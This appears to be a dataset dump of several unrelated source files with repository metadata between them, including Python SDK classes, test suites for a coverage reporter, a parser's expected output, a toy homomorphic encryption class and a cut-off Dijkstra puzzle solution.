bootstrap_conf.world_size = str2int(os.getenv("WORLD_SIZE"))
bootstrap_conf.rank = str2int(os.getenv("RANK"))
env_proto.ctrl_bootstrap_conf.CopyFrom(bootstrap_conf)
cpp_logging_conf = env_pb.CppLoggingConf()
if os.getenv("GLOG_log_dir"):
cpp_logging_conf.log_dir = os.getenv("GLOG_log_dir")
if os.getenv("GLOG_logtostderr"):
cpp_logging_conf.logtostderr = int(os.getenv("GLOG_logtostderr"))
if os.getenv("GLOG_logbuflevel"):
        cpp_logging_conf.logbuflevel = int(os.getenv("GLOG_logbuflevel"))
env_proto.cpp_logging_conf.CopyFrom(cpp_logging_conf)
device_tag2default_parallel_conf = {}
default_env_proto = _DefaultEnvProto()
config_master_addr = ctrl_bootstrap_pb.Address()
config_world_size = 0
config_bootstrap_ctrl_port = 0
config_node_size = 0
global_ctrl_bootstrap_confs = []
| 32.658915
| 144
| 0.708205
|
3a0f3fa52e98156407557cebe9bd163c630c5e3c
| 3,851
|
py
|
Python
|
exabel_data_sdk/client/api/data_classes/relationship_type.py
|
burk/python-sdk
|
83fb81d09e0d6a407c8907a75bebb895decc7edc
|
[
"MIT"
] | null | null | null |
exabel_data_sdk/client/api/data_classes/relationship_type.py
|
burk/python-sdk
|
83fb81d09e0d6a407c8907a75bebb895decc7edc
|
[
"MIT"
] | null | null | null |
exabel_data_sdk/client/api/data_classes/relationship_type.py
|
burk/python-sdk
|
83fb81d09e0d6a407c8907a75bebb895decc7edc
|
[
"MIT"
] | null | null | null |
from typing import Mapping, Optional, Union
from exabel_data_sdk.client.api.proto_utils import from_struct, to_struct
from exabel_data_sdk.stubs.exabel.api.data.v1.all_pb2 import (
RelationshipType as ProtoRelationshipType,
)
class RelationshipType:
"""
A relationship type resource in the Data API.
Attributes:
name (str): The resource name of the relationship type, for example
"relationshipTypes/namespace.relationshipTypeIdentifier".
The namespace must be empty (being global) or one of the
predetermined namespaces the customer has access to. The
relationship type identifier must match the regex
[A-Z][A-Z0-9_]{0,63}.
description (str): One or more paragraphs of text description.
properties (dict): The properties of this entity.
read_only (bool): Whether this resource is read only.
is_ownership (bool): Whether this relationship type is a data set ownership.
"""
def __init__(
self,
name: str,
description: str = "",
        properties: Optional[Mapping[str, Union[str, bool, int, float]]] = None,
read_only: bool = False,
is_ownership: bool = False,
):
"""
Create a relationship type resource in the Data API.
Args:
name: The resource name of the relationship type, for example
"relationshipTypes/namespace.relationshipTypeIdentifier". The namespace
must be empty (being global) or one of the predetermined namespaces the
customer has access to. The relationship type identifier must match the
regex [A-Z][A-Z0-9_]{0,63}.
description: One or more paragraphs of text description.
properties: The properties of this entity.
read_only: Whether this resource is read only.
            is_ownership: Whether this relationship type is a data set ownership.
"""
self.name = name
self.description = description
self.properties = {} if properties is None else properties
self.read_only = read_only
self.is_ownership = is_ownership
@staticmethod
def from_proto(relationship_type: ProtoRelationshipType) -> "RelationshipType":
"""Create a RelationshipType from the given protobuf RelationshipType."""
return RelationshipType(
name=relationship_type.name,
description=relationship_type.description,
properties=from_struct(relationship_type.properties),
read_only=relationship_type.read_only,
is_ownership=relationship_type.is_ownership,
)
def to_proto(self) -> ProtoRelationshipType:
"""Create a protobuf RelationshipType from this RelationshipType."""
return ProtoRelationshipType(
name=self.name,
description=self.description,
properties=to_struct(self.properties),
is_ownership=self.is_ownership,
)
def __eq__(self, other: object) -> bool:
if not isinstance(other, RelationshipType):
return False
return (
self.name == other.name
and self.description == other.description
and self.properties == other.properties
and self.read_only == other.read_only
and self.is_ownership == other.is_ownership
)
def __repr__(self) -> str:
return (
f"RelationshipType(name='{self.name}', description='{self.description}', "
f"properties={self.properties}, read_only={self.read_only}, "
f"is_ownership={self.is_ownership})"
)
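# Minimal usage sketch (the resource name below is hypothetical):
#   rel_type = RelationshipType(
#       name="relationshipTypes/acme.HAS_SUPPLIER",
#       description="Links a company to one of its suppliers.",
#   )
#   proto = rel_type.to_proto()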
| 42.318681
| 96
| 0.614646
|
a938a75f14c79bb2bf288e3f86f0e49bad42fd67
| 270
|
py
|
Python
|
run.py
|
robot-lab/PetProject
|
377ff1dc18db9d2db3471cece7f8289d782b0db7
|
[
"Apache-2.0"
] | 1
|
2019-07-16T16:16:45.000Z
|
2019-07-16T16:16:45.000Z
|
run.py
|
robot-lab/PetProject
|
377ff1dc18db9d2db3471cece7f8289d782b0db7
|
[
"Apache-2.0"
] | 2
|
2019-07-12T20:57:12.000Z
|
2021-06-01T23:58:04.000Z
|
run.py
|
robot-lab/PetProject
|
377ff1dc18db9d2db3471cece7f8289d782b0db7
|
[
"Apache-2.0"
] | null | null | null |
import os
from backend import create_app
os.environ.setdefault('FLASK_ENV', 'development')
if __name__ == '__main__':
env_name = os.getenv('FLASK_ENV')
port = int(os.getenv('PORT', 8080))
app = create_app(env_name)
app.run(host='0.0.0.0', port=port)
| 20.769231
| 49
| 0.677778
|
9a2adac758499c02456cbf5236c618e24e954505
| 8,327
|
py
|
Python
|
src/genie/libs/parser/nxos/tests/ShowIpRoute/cli/equal/golden_output14_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpRoute/cli/equal/golden_output14_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpRoute/cli/equal/golden_output14_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"vrf": {
"tn-L2-PBR:vrf-L2-PBR": {
"address_family": {
"ipv4": {
"routes": {
"192.168.1.0/24": {
"route": "192.168.1.0/24",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"direct": True,
"pervasive": True,
"metric": 0,
"route_preference": 1,
"tag": 4294967294,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "10.11.200.98",
"source_protocol": "static",
"best_ucast_nexthop": True,
"updated": "02w00d",
"next_hop_vrf": "overlay-1",
"metric": 0,
"route_preference": 1,
}
}
},
"source_protocol": "static",
},
"192.168.1.1/32": {
"route": "192.168.1.1/32",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"pervasive": True,
"metric": 0,
"route_preference": 0,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "192.168.1.1",
"source_protocol": "local",
"source_protocol_status": "local",
"best_ucast_nexthop": True,
"updated": "02w00d",
"outgoing_interface": "Vlan60",
"metric": 0,
"route_preference": 0,
}
}
},
"source_protocol": "local",
"source_protocol_status": "local",
},
"192.168.100.0/24": {
"route": "192.168.100.0/24",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"direct": True,
"pervasive": True,
"metric": 0,
"route_preference": 1,
"tag": 4294967294,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "10.11.200.98",
"source_protocol": "static",
"best_ucast_nexthop": True,
"updated": "02w00d",
"next_hop_vrf": "overlay-1",
"metric": 0,
"route_preference": 1,
}
}
},
"source_protocol": "static",
},
"192.168.100.1/32": {
"route": "192.168.100.1/32",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"pervasive": True,
"metric": 0,
"route_preference": 0,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "192.168.100.1",
"source_protocol": "local",
"source_protocol_status": "local",
"best_ucast_nexthop": True,
"updated": "02w00d",
"outgoing_interface": "Vlan14",
"metric": 0,
"route_preference": 0,
}
}
},
"source_protocol": "local",
"source_protocol_status": "local",
},
"192.168.254.0/24": {
"route": "192.168.254.0/24",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"direct": True,
"pervasive": True,
"metric": 0,
"route_preference": 1,
"tag": 4294967294,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "10.11.200.98",
"source_protocol": "static",
"best_ucast_nexthop": True,
"updated": "02w00d",
"next_hop_vrf": "overlay-1",
"metric": 0,
"route_preference": 1,
}
}
},
"source_protocol": "static",
},
"192.168.254.1/32": {
"route": "192.168.254.1/32",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"pervasive": True,
"metric": 0,
"route_preference": 0,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "192.168.254.1",
"source_protocol": "local",
"source_protocol_status": "local",
"best_ucast_nexthop": True,
"updated": "02w00d",
"outgoing_interface": "Vlan39",
"metric": 0,
"route_preference": 0,
}
}
},
"source_protocol": "local",
"source_protocol_status": "local",
},
}
}
}
}
}
}
| 47.582857
| 74
| 0.226132
|
7912cba6a5481b4ca966f6cf0ef34473aca18003
| 13,683
|
py
|
Python
|
tests/test_reporters.py
|
kannaiah/pycobertura
|
b5126f2dd4d425f2b83eaa4edf256485b0544559
|
[
"MIT"
] | null | null | null |
tests/test_reporters.py
|
kannaiah/pycobertura
|
b5126f2dd4d425f2b83eaa4edf256485b0544559
|
[
"MIT"
] | 1
|
2021-06-07T13:11:59.000Z
|
2021-06-08T09:54:08.000Z
|
tests/test_reporters.py
|
nilleb/pycobertura
|
25ce699cfb9410d24f8a995b11dce75f64468e75
|
[
"MIT"
] | null | null | null |
from .utils import make_cobertura
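# Strip the embedded <style>...</style> block from generated HTML so the
# assertions below compare only the markup, not the CSS.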
def remove_style_tag(html):
style_pattern_start = '\n <style>'
style_pattern_stop = '\n </style>'
style_starts = html.find(style_pattern_start)
style_stops = html.find(style_pattern_stop) + len(style_pattern_stop)
html_nostyle = html[:style_starts] + html[style_stops:]
return html_nostyle
def test_text_report():
from pycobertura.reporters import TextReporter
cobertura = make_cobertura()
report = TextReporter(cobertura)
assert report.generate() == """\
Filename Stmts Miss Cover Missing
------------------------------ ------- ------ ------- ---------
Main.java 11 0 100.00%
search/BinarySearch.java 12 1 91.67% 24
search/ISortedArraySearch.java 0 0 100.00%
search/LinearSearch.java 7 2 71.43% 19-24
TOTAL 30 3 90.00%"""
def test_text_report__with_missing_range():
from pycobertura.reporters import TextReporter
cobertura = make_cobertura('tests/dummy.with-dummy2-no-cov.xml')
report = TextReporter(cobertura)
assert report.generate() == """\
Filename Stmts Miss Cover Missing
----------------- ------- ------ ------- ---------
dummy/__init__.py 0 0 0.00%
dummy/dummy.py 4 0 100.00%
dummy/dummy2.py 2 2 0.00% 1-2
TOTAL 6 2 66.67%"""
def test_text_report_delta__no_diff():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source1/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
---------- ------- ------ ------- ---------
TOTAL - - -"""
def test_text_report_delta__colorize_True():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=True)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - \x1b[32m-2\x1b[39m +40.00% \x1b[32m-5\x1b[39m, \x1b[32m-6\x1b[39m
dummy/dummy2.py +2 \x1b[31m+1\x1b[39m -25.00% \x1b[32m-2\x1b[39m, \x1b[32m-4\x1b[39m, \x1b[31m+5\x1b[39m
dummy/dummy3.py +2 \x1b[31m+2\x1b[39m - \x1b[31m+1\x1b[39m, \x1b[31m+2\x1b[39m
TOTAL +4 \x1b[31m+1\x1b[39m +31.06%"""
def test_text_report_delta__colorize_True__with_missing_range():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=True)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - \x1b[32m-2\x1b[39m +40.00% \x1b[32m-5\x1b[39m, \x1b[32m-6\x1b[39m
dummy/dummy2.py +2 \x1b[31m+1\x1b[39m -25.00% \x1b[32m-2\x1b[39m, \x1b[32m-4\x1b[39m, \x1b[31m+5\x1b[39m
dummy/dummy3.py +2 \x1b[31m+2\x1b[39m - \x1b[31m+1\x1b[39m, \x1b[31m+2\x1b[39m
TOTAL +4 \x1b[31m+1\x1b[39m +31.06%"""
def test_text_report_delta__colorize_False():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=False)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - -2 +40.00% -5, -6
dummy/dummy2.py +2 +1 -25.00% -2, -4, +5
dummy/dummy3.py +2 +2 - +1, +2
TOTAL +4 +1 +31.06%"""
def test_html_report():
from pycobertura.reporters import HtmlReporter
cobertura = make_cobertura()
report = HtmlReporter(cobertura)
html_output = report.generate()
assert "normalize.css" in html_output
assert "Skeleton V2.0" in html_output
assert remove_style_tag(html_output) == """\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
<th>Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#Main.java">Main.java</a></td>
<td>11</td>
<td>0</td>
<td>100.00%</td>
<td></td>
</tr>
<tr>
<td><a href="#search/BinarySearch.java">search/BinarySearch.java</a></td>
<td>12</td>
<td>1</td>
<td>91.67%</td>
<td>24</td>
</tr>
<tr>
<td><a href="#search/ISortedArraySearch.java">search/ISortedArraySearch.java</a></td>
<td>0</td>
<td>0</td>
<td>100.00%</td>
<td></td>
</tr>
<tr>
<td><a href="#search/LinearSearch.java">search/LinearSearch.java</a></td>
<td>7</td>
<td>2</td>
<td>71.43%</td>
<td>19-24</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>30</td>
<td>3</td>
<td>90.00%</td>
<td></td>
</tr>
</tfoot>
</table>
<h4 id="Main.java">Main.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/Main.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/BinarySearch.java">search/BinarySearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/BinarySearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/ISortedArraySearch.java">search/ISortedArraySearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/ISortedArraySearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/LinearSearch.java">search/LinearSearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/LinearSearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>"""
def test_text_report_delta__no_source():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, show_source=False)
output = report_delta.generate()
assert output == """\
Filename Stmts Miss Cover
--------------- ------- ------ -------
dummy/dummy.py - -2 +40.00%
dummy/dummy2.py +2 +1 -25.00%
dummy/dummy3.py +2 +2 -
TOTAL +4 +1 +31.06%"""
def test_html_report_delta__no_source():
from pycobertura.reporters import HtmlReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = HtmlReporterDelta(cobertura1, cobertura2, show_source=False)
html_output = report_delta.generate()
assert 'Missing' not in html_output
assert '<h4 id=' not in html_output
assert remove_style_tag(html_output) == """\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#dummy/dummy.py">dummy/dummy.py</a></td>
<td>-</td>
<td><span class="green">-2</span></td>
<td>+40.00%</td>
</tr>
<tr>
<td><a href="#dummy/dummy2.py">dummy/dummy2.py</a></td>
<td>+2</td>
<td><span class="red">+1</span></td>
<td>-25.00%</td>
</tr>
<tr>
<td><a href="#dummy/dummy3.py">dummy/dummy3.py</a></td>
<td>+2</td>
<td><span class="red">+2</span></td>
<td>-</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>+4</td>
<td><span class="red">+1</span></td>
<td>+31.06%</td>
</tr>
</tfoot>
</table>
</div>
</body>
</html>"""
def test_html_report_delta():
from pycobertura.reporters import HtmlReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = HtmlReporterDelta(cobertura1, cobertura2)
html_output = report_delta.generate()
assert '.red {color: red}' in html_output
assert '.green {color: green}' in html_output
assert "normalize.css" in html_output
assert "Skeleton V2.0" in html_output
assert remove_style_tag(html_output) == u"""\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
<th>Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#dummy/dummy.py">dummy/dummy.py</a></td>
<td>-</td>
<td><span class="green">-2</span></td>
<td>+40.00%</td>
<td><span class="green">-5</span>, <span class="green">-6</span>
</td>
</tr>
<tr>
<td><a href="#dummy/dummy2.py">dummy/dummy2.py</a></td>
<td>+2</td>
<td><span class="red">+1</span></td>
<td>-25.00%</td>
<td><span class="green">-2</span>, <span class="green">-4</span>, <span class="red">+5</span>
</td>
</tr>
<tr>
<td><a href="#dummy/dummy3.py">dummy/dummy3.py</a></td>
<td>+2</td>
<td><span class="red">+2</span></td>
<td>-</td>
<td><span class="red">+1</span>, <span class="red">+2</span>
</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>+4</td>
<td><span class="red">+1</span></td>
<td>+31.06%</td>
<td></td>
</tr>
</tfoot>
</table><div class="legend">
<dl>
<dt><code>code</code></dt><dd>coverage unchanged</dd>
<dt class="hit"><code>code</code></dt><dd>coverage increased</dd>
<dt class="miss"><code>code</code></dt><dd>coverage decreased</dd>
<dt><code>+</code></dt><dd>line added or modified</dd>
</dl>
</div>
<h4 id="dummy/dummy.py">dummy/dummy.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>2
3
4
5
6 +
</pre>
</td>
<td class="source">
<pre><span class="noop"> pass
</span><span class="noop">
</span><span class="noop">def bar():
</span><span class="hit"> a = 'a'
</span><span class="hit"> d = 'd'
</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="dummy/dummy2.py">dummy/dummy2.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>1
2 +
3
4 +
5
</pre>
</td>
<td class="source">
<pre><span class="noop">def baz():
</span><span class="hit"> c = 'c'
</span><span class="noop">
</span><span class="hit">def bat():
</span><span class="miss"> pass
</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="dummy/dummy3.py">dummy/dummy3.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>1 +
2 +
</pre>
</td>
<td class="source">
<pre><span class="miss">def foobar():
</span><span class="miss"> pass # This is a very long comment that was purposefully written so we could test how HTML rendering looks like when the boundaries of the page are reached. And here is a non-ascii char: \u015e
</span></pre>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>"""
| 29.940919
| 224
| 0.529708
|
2ccbbecdbdb095ac205d5fbf45454e716ad32e5d
| 540
|
py
|
Python
|
cride/circles/urls.py
|
EduuardoPerez/comparte-ride
|
e657e2397a9c8cc3104a716f13cc7547245015e4
|
[
"MIT"
] | null | null | null |
cride/circles/urls.py
|
EduuardoPerez/comparte-ride
|
e657e2397a9c8cc3104a716f13cc7547245015e4
|
[
"MIT"
] | null | null | null |
cride/circles/urls.py
|
EduuardoPerez/comparte-ride
|
e657e2397a9c8cc3104a716f13cc7547245015e4
|
[
"MIT"
] | null | null | null |
"""Circles URLs."""
# Django
from django.urls import include, path
# Django REST Framework
from rest_framework.routers import DefaultRouter
# Views
from .views import circles as circle_views
from .views import memberships as membership_views
router = DefaultRouter()
router.register(r'circles', circle_views.CircleViewSet, basename='circle')
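# Nested route for a circle's members, e.g. /circles/<slug_name>/members/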
router.register(
r'circles/(?P<slug_name>[-a-zA-Z0-9_-]+)/members',
membership_views.MembershipViewSet,
basename='membership'
)
urlpatterns = [
path('', include(router.urls))
]
| 22.5
| 74
| 0.75
|
e7ab25e820084701fbfcebea9260921b3086d449
| 484
|
py
|
Python
|
ExamenDeFundamentosDeP/Examen1.py
|
Sharnol-Tec/Examen
|
fc859c5a56cf9e550e903296eecdb53b42ec9b2f
|
[
"Apache-2.0"
] | null | null | null |
ExamenDeFundamentosDeP/Examen1.py
|
Sharnol-Tec/Examen
|
fc859c5a56cf9e550e903296eecdb53b42ec9b2f
|
[
"Apache-2.0"
] | null | null | null |
ExamenDeFundamentosDeP/Examen1.py
|
Sharnol-Tec/Examen
|
fc859c5a56cf9e550e903296eecdb53b42ec9b2f
|
[
"Apache-2.0"
] | null | null | null |
# input data
PrimeraUnidadSLLB = float(input("Enter the grade for PrimeraUnidadSLLB: "))
SegundaUnidadSLLB = float(input("Enter the grade for SegundaUnidadSLLB: "))
TerceraUnidadSLLB = float(input("Enter the grade for TerceraUnidadSLLB: "))
TrabajoFinalSLLB = float(input("Enter the grade for TrabajoFinalSLLB: "))
# process: weighted average (20% + 15% + 15% + 50%)
nota = PrimeraUnidadSLLB*0.2 + SegundaUnidadSLLB*0.15 + TerceraUnidadSLLB*0.15 + TrabajoFinalSLLB*0.5
# output
print("The student's final grade is:", nota)
| 53.777778
| 99
| 0.789256
|
62b99b8da2aecb88766819c7135ff9c55eef6434
| 1,808
|
py
|
Python
|
src/users/actions.py
|
josue0ghost/Python-and-MySQL-console-application
|
c82641c5ccaae3eb526decd2c96baa4457613a2a
|
[
"MIT"
] | null | null | null |
src/users/actions.py
|
josue0ghost/Python-and-MySQL-console-application
|
c82641c5ccaae3eb526decd2c96baa4457613a2a
|
[
"MIT"
] | null | null | null |
src/users/actions.py
|
josue0ghost/Python-and-MySQL-console-application
|
c82641c5ccaae3eb526decd2c96baa4457613a2a
|
[
"MIT"
] | null | null | null |
import users.user as user
import grades.actions as grade
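# Console menu flow: sign a user up or in, then dispatch grade actions until exit.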
class Actions:
def signup(self):
print("Selected item: signup")
name = input("Your name: ")
lastname = input("Your last name: ")
email = input("Your email: ")
password = input("Choose a password: ")
newUser = user.User(name, lastname, email, password)
reg = newUser.register()
if reg[0] >= 1:
print(f"{reg[1].name}, you've been registered with email {reg[1].email}")
else:
print("Registration failed")
def signin(self):
try:
email = input("Email: ")
password = input("Password: ")
existingUser = user.User('', '', email, password)
login = existingUser.identify()
# id | name | lastname | email | password | date
if email == login[3]:
print(f"Welcome, {login[1]}")
self.mainMenu(login)
except Exception as e:
print(type(e))
print(type(e).__name__)
print("Login failed")
def mainMenu(self, user):
print("""
Available options:
- Create grade (create)
- Show grades (show)
- Delete grade (delete)
- Log out (exit)
""")
action = input("What do you want to do?: ")
gradeActions = grade.Actions()
if action == "create":
gradeActions.create(user)
self.mainMenu(user)
elif action == "show":
gradeActions.show(user)
self.mainMenu(user)
elif action == "delete":
gradeActions.delete(user)
self.mainMenu(user)
elif action == "exit":
exit()
| 28.25
| 85
| 0.499447
|
36cc56a3d75181b864d339aa3b5b0b437e605cf8
| 654
|
py
|
Python
|
mojo/system/PRESUBMIT.py
|
Fusion-Rom/android_external_chromium_org
|
d8b126911c6ea9753e9f526bee5654419e1d0ebd
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2015-08-13T21:04:58.000Z
|
2015-08-13T21:04:58.000Z
|
mojo/system/PRESUBMIT.py
|
Fusion-Rom/android_external_chromium_org
|
d8b126911c6ea9753e9f526bee5654419e1d0ebd
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
mojo/system/PRESUBMIT.py
|
Fusion-Rom/android_external_chromium_org
|
d8b126911c6ea9753e9f526bee5654419e1d0ebd
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2020-11-04T06:34:36.000Z
|
2020-11-04T06:34:36.000Z
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Presubmit script for mojo/system.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details about the presubmit API built into depot_tools.
"""
def CheckChangeOnUpload(input_api, output_api):
results = []
results += input_api.canned_checks.CheckChangeHasOnlyOneEol(input_api,
output_api)
results += input_api.canned_checks.CheckPatchFormatted(input_api, output_api)
return results
| 38.470588
| 79
| 0.718654
|
12934dffdf93d2ba8c4aaff60d85e2a3fd0b25e0
| 839
|
py
|
Python
|
homomorphic_encryption/secret_key_swhe.py
|
binary-signal/some-what-homomorphic-encryption
|
861c752416e2669a4b9e1824f93b5593a8b4abd6
|
[
"BSD-3-Clause"
] | 1
|
2019-02-09T06:36:54.000Z
|
2019-02-09T06:36:54.000Z
|
homomorphic_encryption/secret_key_swhe.py
|
binary-signal/some-what-homomorphic-encryption
|
861c752416e2669a4b9e1824f93b5593a8b4abd6
|
[
"BSD-3-Clause"
] | null | null | null |
homomorphic_encryption/secret_key_swhe.py
|
binary-signal/some-what-homomorphic-encryption
|
861c752416e2669a4b9e1824f93b5593a8b4abd6
|
[
"BSD-3-Clause"
] | 1
|
2018-07-06T10:03:53.000Z
|
2018-07-06T10:03:53.000Z
|
# -*- coding: utf-8 -*-
from keys.secret_key import SecretKey
from random import randint
from math import sqrt
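# Toy DGHV-style somewhat homomorphic scheme over the integers: a bit m is
# encrypted as c = p*q + 2*r + m for secret p, random q and small noise r;
# decryption is (c mod p) mod 2.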
class secret_swhe:
def __init__(self, lambda_, secret_key=None, eta=10):
self.lambda_ = lambda_
self.eta = eta
if secret_key is None:
self.p = self._key_gen(eta)
else:
self.p = secret_key
def _key_gen(self, eta):
k = SecretKey(eta)
return k.key_gen()
def encrypt(self, m):
while True:
r = randint(round(2 ** (sqrt(self.eta) - 1)), round(2 ** sqrt(self.eta)) + 1)
if abs(2 * r) < self.p / 2: # this must hold to find q
break
q = randint(2 ** ((self.eta ** 3) - 1), 2 ** (self.eta ** 3))
return self.p * q + 2 * r + m
def decrypt(self, c):
return (c % self.p) % 2
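if __name__ == "__main__":
    # Hypothetical smoke test, not part of the original module. Supplying an
    # explicit odd secret key keeps the demo independent of keys.secret_key.
    demo = secret_swhe(lambda_=4, secret_key=10007, eta=4)
    for bit in (0, 1):
        assert demo.decrypt(demo.encrypt(bit)) == bit
    # Additive homomorphism: adding two ciphertexts XORs the underlying bits.
    assert demo.decrypt(demo.encrypt(1) + demo.encrypt(1)) == 0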
| 27.966667
| 89
| 0.531585
|
d3e4f155aef63c0aa0f2d540868c2ca27cec90e9
| 1,622
|
py
|
Python
|
day-15/part-1/th-ch.py
|
lypnol/adventofcode-2021
|
8ba277d698e8c59ca9cd554acc135473f5964b87
|
[
"MIT"
] | 6
|
2021-11-29T15:32:27.000Z
|
2021-12-10T12:24:26.000Z
|
day-15/part-1/th-ch.py
|
lypnol/adventofcode-2021
|
8ba277d698e8c59ca9cd554acc135473f5964b87
|
[
"MIT"
] | 9
|
2021-11-29T15:38:04.000Z
|
2021-12-13T14:54:16.000Z
|
day-15/part-1/th-ch.py
|
lypnol/adventofcode-2021
|
8ba277d698e8c59ca9cd554acc135473f5964b87
|
[
"MIT"
] | 3
|
2021-12-02T19:11:44.000Z
|
2021-12-22T20:52:47.000Z
|
from tool.runners.python import SubmissionPy
from queue import PriorityQueue
class ThChSubmission(SubmissionPy):
def run(self, s):
"""
:param s: input in string format
:return: solution flag
"""
# Your code goes here
m = [[int(i) for i in line] for line in s.splitlines()]
# Dijkstra with priority queue
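        # Comment added for clarity: m[y][x] is the risk of entering cell (x, y),
        # D holds the best known total risk from the start to each cell, and the
        # priority queue always expands the cheapest cell discovered so far.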
D = {(x, y): float("inf") for x in range(len(m)) for y in range(len(m))}
D[(0, 0)] = 0
pq = PriorityQueue()
visited = set()
pq.put((0, (0, 0)))
while not pq.empty():
(dist, (x, y)) = pq.get()
visited.add((x, y))
for (dx, dy) in [(-1, 0), (0, -1), (1, 0), (0, 1)]:
if 0 <= x + dx < len(m) and 0 <= y + dy < len(m):
distance = m[y + dy][x + dx]
if (x + dx, y + dy) not in visited:
old_cost = D[(x + dx, y + dy)]
new_cost = D[(x, y)] + distance
if new_cost < old_cost:
